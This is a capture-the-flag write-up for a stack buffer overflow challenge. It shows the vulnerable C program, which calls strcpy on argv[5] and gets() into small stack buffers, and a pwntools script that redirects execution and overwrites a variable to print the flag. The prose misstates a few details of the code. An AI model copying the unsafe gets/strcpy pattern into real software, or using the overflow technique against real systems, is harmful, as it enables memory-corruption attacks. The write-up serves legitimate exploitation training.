Purpose : Get The Flag
Checking binary security measures.
Source Code is given. Reading through it we can see that it is checking if the argument passed to binary is equal to 10. If the condition is met will copy the 5th argv to a stack of 10 bytes without checking input which creates a stack-based buffer overflow. Using This vuln be redirected code to strcpp function. now have to modify _var to 24415 to print the flag which is present on the stack.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void strcpp() {
volatile int _var = 25;
char local_buffer[10];
printf("I really thought you wouldn't find this :(\n");
printf("Well, you still need to one more thing before going for the flag\n>> ");
gets(local_buffer);
if(_var == 24415) {
printf("\nYou really are pretty good at this. Here's the flag: ");
char flag[30];
FILE* fptr = fopen("flag.txt", "r");
if (fptr == NULL) {
printf("\nError reading flag from the file. Please contact TheFlash2k...\n");
exit(-1);
}
fscanf(fptr, "%s", flag);
printf("%s\n", flag);
fclose(fptr);
exit(0);
}
exit(1);
}
int main(int argc, char* argv[]) {
setbuf(stdin, NULL);
setbuf(stdout, NULL);
char buffer[50];
if(argc == 10) {
strcpy(buffer, argv[5]);
}
return 0;
}
Now it’s time to exploit this binary.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#!/usr/bin/python3
from pwn import *
import struct
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw)
exe = './bof'; elf = context.binary = ELF(exe, checksec=False);exe_rop = ROP(elf,checksec=False)
io = start(["A","A","A","A",b"A"*58+p32(elf.functions.strcpp.address),"A","A","A","A"])
payload = b"B"*10 + p32(0x5f5f)
io.sendlineafter(b">>",payload)
io.interactive()
